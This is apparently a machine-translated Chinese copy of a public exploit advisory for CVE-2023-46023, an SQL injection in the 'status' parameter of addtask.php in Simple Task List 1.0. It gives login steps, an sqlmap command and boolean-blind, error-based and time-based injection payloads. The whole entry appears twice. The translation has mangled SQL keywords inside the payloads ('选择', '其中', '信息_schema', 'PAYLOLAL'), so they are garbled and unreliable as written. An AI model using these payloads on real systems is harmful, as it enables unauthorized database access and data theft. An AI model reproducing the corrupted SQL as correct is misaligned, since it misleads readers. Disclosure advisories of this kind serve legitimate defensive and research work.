#利用标题:简单任务列表1.0-'状态'sqli
#日期: 2023-11-15
#利用作者: Ersin Erenler
#供应商homepage: https://code-projects.org/simple-task-list-in-php-with-with-source-code
#软件link: https://download-media.code-project...st_in_in_php_with_with_source_source_code.zip
#版本: 1.0
#在: Windows/Linux,Apache 2.4.54,PHP 8.2.0测试
#CVE : CVE-2023-46023
----------------------------------------------------------------------------------------------------------------------------
#Description:
简单的任务列表v1.0容易受到一个重要的安全漏洞,这是由于对addtask.php文件中的“状态”参数的保护不足。该缺陷可能会被利用以注入恶意的SQL查询,从而导致未经授权的访问和从数据库中提取敏感信息。
脆弱的file: /addtask.php
参数名称:状态
#概念证明:
--------------------------------------
1。注册并登录系统
2。添加一个项目和任务
3。然后使用SQLMAP利用
4. sqlmap -u 'http://localhost/Tasklist/addTask.php' --headers 'Cookie: PHPSESSID=php-cookie-value' --method POST --data 'name=teststatus=N' -p status --risk 3 --level 5 --dbms mysql --batch --current-db
#SQLMAP响应:
--------------------------------------
---
参数:状态(POST)
Type:基于布尔的盲人
title:和基于布尔的盲人- 在哪里或有子句
payload:名称=testStatus=n'||(选择0x59506356其中1189=1189和7323=7323)||'
type:基于错误的
title: mysql=5.0和基于错误的- 在哪里,订购,按子句(floor)
PAYLOLAL:名称=testStatus=n'||(选择0x6b786b49其中7851=7851=7851和(从(选择9569)(选择Count(*),Concat(0x7171787171)(0x7171787171,(select(select(select(elt(9569=9569)))信息_schema.plugins组由x)a))||'
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
payload:名称=testStatus=n'||(选择0x56697775a其中4483=4483=4483和(从(select(select(5))iflc select 3096)iflc)||'
---
#日期: 2023-11-15
#利用作者: Ersin Erenler
#供应商homepage: https://code-projects.org/simple-task-list-in-php-with-with-source-code
#软件link: https://download-media.code-project...st_in_in_php_with_with_source_source_code.zip
#版本: 1.0
#在: Windows/Linux,Apache 2.4.54,PHP 8.2.0测试
#CVE : CVE-2023-46023
----------------------------------------------------------------------------------------------------------------------------
#Description:
简单的任务列表v1.0容易受到一个重要的安全漏洞,这是由于对addtask.php文件中的“状态”参数的保护不足。该缺陷可能会被利用以注入恶意的SQL查询,从而导致未经授权的访问和从数据库中提取敏感信息。
脆弱的file: /addtask.php
参数名称:状态
#概念证明:
--------------------------------------
1。注册并登录系统
2。添加一个项目和任务
3。然后使用SQLMAP利用
4. sqlmap -u 'http://localhost/Tasklist/addTask.php' --headers 'Cookie: PHPSESSID=php-cookie-value' --method POST --data 'name=teststatus=N' -p status --risk 3 --level 5 --dbms mysql --batch --current-db
#SQLMAP响应:
--------------------------------------
---
参数:状态(POST)
Type:基于布尔的盲人
title:和基于布尔的盲人- 在哪里或有子句
payload:名称=testStatus=n'||(选择0x59506356其中1189=1189和7323=7323)||'
type:基于错误的
title: mysql=5.0和基于错误的- 在哪里,订购,按子句(floor)
PAYLOLAL:名称=testStatus=n'||(选择0x6b786b49其中7851=7851=7851和(从(选择9569)(选择Count(*),Concat(0x7171787171)(0x7171787171,(select(select(select(elt(9569=9569)))信息_schema.plugins组由x)a))||'
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
payload:名称=testStatus=n'||(选择0x56697775a其中4483=4483=4483和(从(select(select(5))iflc select 3096)iflc)||'
---